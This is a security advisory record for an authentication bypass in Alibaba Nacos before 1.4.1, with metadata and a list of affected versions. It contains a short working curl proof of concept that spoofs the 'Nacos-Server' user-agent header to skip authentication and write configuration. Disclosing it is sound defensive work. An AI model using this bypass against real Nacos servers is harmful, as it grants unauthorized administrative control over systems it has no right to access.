GHSA-36hp-jr8h-556f
Suggest an improvement- Source
- https://github.com/advisories/GHSA-36hp-jr8h-556f
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-36hp-jr8h-556f/GHSA-36hp-jr8h-556f.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-36hp-jr8h-556f
- Aliases
- Published
- 2021-04-27T20:09:17Z
- Modified
- 2024-12-02T05:44:18.113846Z
- Summary
- Authentication Bypass
- Details
-
When configured to use authentication (
-Dnacos.core.auth.enabled=true) Nacos uses theAuthFilterservlet filter to enforce authentication. This filter has a backdoor that enables Nacos servers to bypass this filter and therefore skip authentication checks. This mechanism relies on theuser-agentHTTP header so it can be easily spoofed.The following request to the
configurationendpoint gets rejected as we are not providing any credentials:❯ curl -X POST "http://127.0.0.1:8848/nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld" {"timestamp":"2020-12-02T14:33:57.154+0000","status":403,"error":"Forbidden","message":"unknown user!","path":"/nacos/v1/cs/configs"}However the following one gets accepted by using the
Nacos-Serveruser-agent header:❯ curl -X POST -A Nacos-Server "http://127.0.0.1:8848/nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld" trueImpact
This issue may allow any user to carry out any administrative tasks on the Nacos server.
- Database specific
{ "nvd_published_at": "2021-04-27T21:15:00Z", "cwe_ids": [ "CWE-290" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2021-04-27T20:08:38Z" }- References
Affected packages
Maven / com.alibaba.nacos:nacos-common
Package
- Name
- com.alibaba.nacos:nacos-common
- View open source insights on deps.dev
- Purl
- pkg:maven/com.alibaba.nacos/nacos-common
Affected ranges
- Type
- ECOSYSTEM
- Events
-
Introduced0Unknown introduced version / All previous versions are affectedFixed1.4.1
Affected versions
0.*
0.1.0
0.2.0
0.2.1-RC1
0.2.1
0.3.0-RC1
0.3.0
0.4.0
0.5.0
0.6.0
0.6.1
0.6.2
0.8.0
0.8.1
0.8.2
0.9.0
0.9.1
1.*
1.0.0-RC1
1.0.0-RC2
1.0.0-RC3
1.0.0-RC4
1.0.0
1.0.1
1.1.0
1.1.1
1.1.2
1.1.3
1.1.4
1.2.0-beta.0
1.2.0-beta.1
1.2.0
1.2.1
1.3.0
1.3.1-BETA
1.3.1-BETA.1
1.3.1
1.3.2
1.3.3
1.4.0-BETA
1.4.0